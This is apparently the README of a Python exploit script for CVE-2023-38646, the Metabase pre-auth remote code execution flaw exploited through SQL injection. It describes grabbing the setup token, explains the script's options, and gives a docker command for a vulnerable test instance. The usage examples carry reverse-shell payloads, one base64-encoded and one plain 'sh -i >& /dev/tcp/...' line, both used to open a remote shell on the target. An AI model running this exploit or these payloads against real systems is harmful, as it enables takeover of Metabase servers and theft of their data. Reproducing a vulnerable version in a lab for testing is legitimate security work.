Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection

The script will GET /api/session/properties to get the setup token and assess exploitability of the target. If it's vulnerable will then print the setup token, else it will quit after an error message.

If the -x option is used and the target is vulnerable, it will use the provided payload to attempt to exploit the vulnerability.

More information in this awesome writeup by the team who discovered the vulnerability: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Usage: CVE-2023-38646.py [-h] [-x BASE64 PAYLOAD] url

Metabase Pre-Auth RCE Exploit

positional arguments:
  url                Url of the metabase instance

optional arguments:
  -h, --help         Show this help message and exit
  -x BASE64_PAYLOAD  Exploits the vulnerability

If needed, you can quickly spin up a test environment in a docker container using this command :

docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.46.6

After visiting http://127.0.0.1:3000/ to finish the setup, and starting a listener,
You can exploit the RCE with something like this :

python3 ./CVE-2023-38646.py -x c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTAvNDQ0MyAwPiYx http://127.0.0.1:3000/

# If you prefer this and use bash (or anything but fish really)
# you should be able to command substitution to encode your payload directly inline like so
python3 ./CVE-2023-38646.py -x $(echo "sh -i >& /dev/tcp/127.0.0.1/4443 0>&1" | base64) http://127.0.0.1:3000/

or just grab your own base64 encoded reverse shell by visiting revshells.com